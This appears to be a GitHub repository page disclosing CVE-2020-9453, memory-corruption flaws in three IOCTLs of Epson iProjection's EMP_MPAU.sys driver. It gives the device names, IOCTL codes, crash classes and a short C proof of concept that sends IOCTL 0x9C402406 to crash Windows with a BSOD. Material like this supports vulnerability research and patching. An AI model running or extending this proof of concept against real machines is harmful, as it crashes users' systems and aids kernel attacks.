Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Kernel-exploits/EMP_MPAU.sys/
Kernel-exploits/EMP_MPAU.sys/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 

Epson iProjection - EMP_MPAU.sys (CVE-2020-9453)

POC exploits for various vulnerabilities found in the EMP_MAU.sys driver associated with Epson's iProjection software


# Exploit Title: Epson iProjection v2.30 Driver EMP_MPAU.sys Memory Corruption
# Date: 02/15/2020
# Exploit Author: FULLSHADE
# Vendor Homepage: https://epson.com
# Software Link: https://www.epson.eu/epson-projector-software
# Version: v.2.30
# Tested on: Windows 7 /  Windows 10
# CVE : CVE-2020-9453

EMP_MPAU.sys

Within the EMP_MPAU.sys driver provided from Epson iProjection v2.30, there are three vulnerabilities via IOCTLs found in the sub_1300C function.

Address    | IOCTL Code | Device    | Function  | Method  |                    Access
0x1303B    | 0x9C402402 | <UNKNOWN>   0x9C40    | 0x900   | METHOD_OUT_DIRECT 2    | FILE_ANY_ACCESS (0)
0x13047    | 0x9C402406 | <UNKNOWN>   0x9C40    | 0x901   | METHOD_OUT_DIRECT 2    | FILE_ANY_ACCESS (0)
0x1304F    | 0x9C40240A | <UNKNOWN>   0x9C40    | 0x902   | METHOD_OUT_DIRECT 2    | FILE_ANY_ACCESS (0)

IOCTLs in IDA

IOCTL crash classes :

IOCTL WinDBG BUGCHECK_STR DEFAULT_BUCKET_ID POC POC RESULT
0x9C402402 ACCESS_VIOLATION NULL_CLASS_PTR_DEREFERENCE BSOD
0x9C402406 ACCESS_VIOLATION CODE_CORRUPTION BSOD
0x9C40240A ACCESS_VIOLATION CODE_CORRUPTION BSOD

Device names:

  • \Device\EMPMPAUIO
  • \DosDevices\EMPMPAU

BSOD crash POC outline skeleton code

#include <stdio.h>
#include <tchar.h>
#include <windows.h>


int _tmain(int argc, _TCHAR* argv[])
{
	HANDLE m_handle = 0;
	DWORD nbBytes = 0;
	m_handle = CreateFileA("\\\\.\\EMPMPAU", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
	DeviceIoControl(m_handle, 0x9C402406, (LPVOID)0, 0x0, (LPVOID)0, 0x0, &nbBytes, NULL);

	return 0;
}